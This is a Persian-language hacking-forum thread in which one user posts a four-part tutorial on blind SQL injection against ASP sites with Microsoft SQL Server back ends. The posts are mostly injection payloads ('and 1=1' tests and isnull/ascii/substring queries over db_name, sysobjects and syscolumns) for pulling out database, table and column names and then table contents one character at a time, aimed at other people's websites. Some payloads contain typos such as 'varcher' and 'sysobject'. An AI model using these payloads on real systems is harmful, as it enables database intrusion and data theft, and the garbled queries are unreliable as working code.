MR.MSA ارسال شده در آگوست 13 2020 گزارش اشتراک گذاری ارسال شده در آگوست 13 2020 با سلام خدمت شما کاربران و مدیران عزیز گارد ایران در این پست می خواهم به شما متد قدرتمند blind را در سایت های asp آموزش بدهم . Blind to asp تست اسیب پذیری : and 1=1 باید لود شود و and 1=2 نباید لود شود . نام دیتابیس با دستور : and isnull (ascii(substring (cast((select lower(db_name(0)))as varchar(8000)),1,1)),0)>97 97 که با کد ascii می شود a و داریم می گوییم حرف اول نام دیتابیس a است و اگر صفحه لود شد یعنی حرف اول a نیست و 97 مثلا می شود 98 یعنی b و به همین صورت پیش می روید یکی یکی تا اینکه به یک عدد برسید که صفحه لود نشود و ان اولین حرف نام دیتابیس هست و بیشتر کار ها هم مثل blind در mysql است و برای مثلا انجام دادن همین کار برای حرف دوم نام دیتابیس ان عدد را که در دستور بالا قرمز کردیم را مثلا کنید ۲ و برای حرف ۳ بکنید ۳ و به همین صورت . ببخشید که یک کمی طولانی شد . --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- نکته : اگر یک زمان نتیجه این طور شد : (مثلا برای حرف ۲) 99 < true 100 > true 99 = false یعنی بیشتر از ۹۹ و کمتر از ۱۰۰ و ۹۹ هم نیست پس بین این ها ۹۹.۵ است که تخمین زده می شود به ۱۰۰ به این صورت : This is the hidden content, please ورود یا ثبت نام --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- بیرون کشیدن نام دیتابیس های بعدی : and isnull (ascii(substring(cast((select lower (db_name(0))) as varcher (8000)),1,1)),0)>97 برای اینکار ان عدد 0 را که آبی هست یکی یکی اضافه کنید تا یکی یکی بروید به دیتابیس بعد . مثال : and isnull (ascii(substring(cast((select lower (db_name(1))) as varcher (8000)),6,1)),0)>97 and isnull (ascii(substring(cast((select lower (db_name(2))) as varcher (8000)),4,1)),0)>98 and isnull (ascii(substring(cast((select lower (db_name(3))) as varcher (8000)),3,1)),0)>102 and isnull (ascii(substring(cast((select lower (db_name(4))) as varcher (8000)),1,1)),0)>107 --------- --------- --------- --------- --------- --------- --------- --------- --------- --------- چون متد پیچیده ای هست و برای اینکه پست طولانی نشود در آموزش بعد به شما بیرون کشیدن تیبل ها را آموزش می دهم . واکنش ها : ali-98، Reza.Black، johnjones و 6 نفر دیگر 7 2 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
MR.MSA ارسال شده در آگوست 13 2020 نویسنده گزارش اشتراک گذاری ارسال شده در آگوست 13 2020 با سلام خدمت دوستان عزیز در این پست همانطور که گفتم قرار است بیرون کشیدن تیبل ها را به شما آموزش دهم . بیرون کشیدن تیبل ها : and isnull (ascii(substring(cast((select top 1 lower (name) from sysobjects where xtype=0x55 and name not in (select top 1 lower (name) from sysobjects where xtype=0x55))as varcher (8000)),1,1)),0)>97 برای حرف دوم ، عدد بنفش را یکی یکی اضافه کنید و بقیه چیز ها هم مثل blind معمولی است و اینکه مثلا شما امدید و تمام حرف های تیبل اول را بدست اوردید اما بدرد شما نخورد برای اینکه بروید تیبل دوم ان عدد بعد از top (که ابی و بولد است) را یکی یکی اضافه کنید . در پست بعد به شما آموزش بیرون کشیدن ستون ها رو میدم . دوستانی که متد blind در سایت های php بلد نیستند و یا دوست دارند تا من آموزش متد blind در سایت های php را بزارم از این پست حمایت کنند . واکنش ها : R3DN4X314، mat، RT3N و 3 نفر دیگر 5 1 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
MR.MSA ارسال شده در آگوست 13 2020 نویسنده گزارش اشتراک گذاری ارسال شده در آگوست 13 2020 همانطور که گفتم در در این پست قصد دارم آموزش بیرون کشیدن ستون ها رو بدم . بیرون کشیدن ستون های یک جدول : and isnull (ascii(substring(cast((select p.name from(select (select count (i.colid)rid from syscolumns i where (i.colid<=o.colid)and id=(select id from sysobjects where name=’X’ ))x,name from syscolumns o where id=(select id from sysobject where name=’X’))p where(p.x=1)) as varcher (8000)),1,1)),0)>97 در دو قسمتی که این X قرار داشت نام تیبل مهم را بنویسید و عدد ۹۷ که ابی هست یعنی نشان دهنده حروف در ستون ها می تواند کمتر ش هم کنید ( یعنی می تواند حروف بزرگ هم باشد. ) و عدد بنفش هم برای رفتن به کاراکتر بعدی هست و برای اینکه بروید ستون بعد ان عدد ۱ که بولد و سبز است را زیاد می کنید و بقیه مراحل هم مثل روش های قبل . امیدوارم از این پست لذت برده باشید و در پست بعد آموزش بیرون کشیدن اطلاعات ستون ها بهتون میدم . خوش باشید . واکنش ها : mat، mr.hacker-7، RT3N و 4 نفر دیگر 6 1 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
MR.MSA ارسال شده در آگوست 14 2020 نویسنده گزارش اشتراک گذاری ارسال شده در آگوست 14 2020 بیرون کشیدن اطلاعات ستون های یک جدول : and ascii(substring(select column from table where masir),1,1))>97 به جای column نام ستون مورد نظر را بنویسید و به جای table نام تیبل مهم را بنویسید و به جای masir چیز های متد GET ( به غییر از چیز هایی که خودمان نوشته ایم )یعنی مثلا id=1 و بقیه مراحل هم به همین صورت برای بیرو کشیدن حرف اول همان عدد 97 را تغییر و برای رفتن به کاراکتر بعدی همان عدد 1 همیشگی . امیدوارم لذت برده باشید ، ببخشید که یک زره پست بخش بخش شد در پست های بعد این مشکل رو حل می کنم. واکنش ها : mat، johnjones، ali-98 و 3 نفر دیگر 5 1 نقل قول لینک به دیدگاه به اشتراک گذاری در سایت های دیگر گزینه های به اشتراک گذاری بیشتر...
پست های پیشنهاد شده
به گفتگو بپیوندید
هم اکنون می توانید مطلب خود را ارسال نمایید و بعداً ثبت نام کنید. اگر حساب کاربری دارید، برای ارسال با حساب کاربری خود اکنون وارد شوید .